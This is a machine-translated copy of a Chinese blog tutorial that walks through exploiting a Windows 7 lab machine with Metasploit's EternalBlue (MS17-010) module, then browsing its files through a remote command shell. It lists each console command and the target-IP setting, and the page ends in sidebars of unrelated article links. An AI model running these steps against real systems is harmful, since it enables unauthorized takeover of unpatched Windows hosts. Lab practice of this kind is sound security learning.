当前位置:网站首页>Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
Network security engineer Demo: the original * * is to get your computer administrator rights! 【***】
2020-11-06 01:17:00 【Kali and programming】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Win7 A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 utilize Metasploit(msf)*** The framework performs on the target host ***, As shown in the figure below .
step 1: start-up Metasploit(msf)*** frame , As shown in the figure below .
command :msfconsole
step 2:Metasploit(msf)*** Framework started successfully , As shown in the figure below .
step 3: Search vulnerability , As shown in the figure below .
command :search Hole number
Example :search ms17-010
step 4: Retrieve the exploit module of the vulnerability, as shown in the figure below .
step 5: Select the corresponding exploit module and use , As shown in the figure below .
command :use Exploit module name
Example :use exploit/windows/smb/ms17_010_eternalblue
step 6: Check the parameters that need to be set for the vulnerability module used , As shown in the figure below ..
command :show option
step 7: Set up *** Parameters , As shown in the figure below .
command :set rhosts Victim host IP
Example :set rhosts 192.168.78.160
step 8: Check whether the corresponding parameters are set successfully , As shown in the figure below .
command :show options
step 9: Run the exploit module , As shown in the figure below .
command :run
step 10: As shown in the figure below , Successfully captured the target host
Tips :ETERNALBLUE overwrite completed successfully!
3.2 After entering *** Stage , utilize DOS Command control target host , As shown in the figure below .
step 1: Get into Windows Systematic cmd window , As shown in the figure below .
step 2: Use the command to view the folder information of the victim's host , As shown in the figure below .
command :dir
Switch folder directory :cd Folder name
Toggle character :cd The name of the drive
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[Kali and programming]所创,转载请带上原文链接,感谢
边栏推荐
- TRON智能钱包PHP开发包【零TRX归集】
- 如果前端不使用SPA又能怎样?- Hacker News
- OPTIMIZER_ Trace details
- Group count - word length
- Skywalking series blog 5-apm-customize-enhance-plugin
- Skywalking series blog 2-skywalking using
- 速看!互联网、电商离线大数据分析最佳实践!(附网盘链接)
- Tool class under JUC package, its name is locksupport! Did you make it?
- Elasticsearch database | elasticsearch-7.5.0 application construction
- 2018中国云厂商TOP5:阿里云、腾讯云、AWS、电信、联通 ...
猜你喜欢
How long does it take you to work out an object-oriented programming interview question from Ali school?
连肝三个通宵,JVM77道高频面试题详细分析,就这?
读取、创建和运行多个文件的3个Python技巧
PHP应用对接Justswap专用开发包【JustSwap.PHP】
网络安全工程师演示:原来***是这样获取你的计算机管理员权限的!【维持】
PHPSHE 短信插件说明
使用NLP和ML来提取和构造Web数据
Filecoin最新动态 完成重大升级 已实现四大项目进展!
数据产品不就是报表吗?大错特错!这分类里有大学问
车的换道检测
随机推荐
PHP应用对接Justswap专用开发包【JustSwap.PHP】
Synchronous configuration from git to consult with git 2consul
Details of dapr implementing distributed stateful service
Skywalking series blog 5-apm-customize-enhance-plugin
Want to do read-write separation, give you some small experience
有关PDF417条码码制的结构介绍
03_ Detailed explanation and test of installation and configuration of Ubuntu Samba
Group count - word length
Every day we say we need to do performance optimization. What are we optimizing?
至联云分享:IPFS/Filecoin值不值得投资?
(2)ASP.NET Core3.1 Ocelot路由
Listening to silent words: hand in hand teaching you sign language recognition with modelarts
hadoop 命令总结
技術總監,送給剛畢業的程式設計師們一句話——做好小事,才能成就大事
從小公司進入大廠,我都做對了哪些事?
在大规模 Kubernetes 集群上实现高 SLO 的方法
A debate on whether flv should support hevc
Using Es5 to realize the class of ES6
Ubuntu18.04上安裝NS-3
微服務 - 如何解決鏈路追蹤問題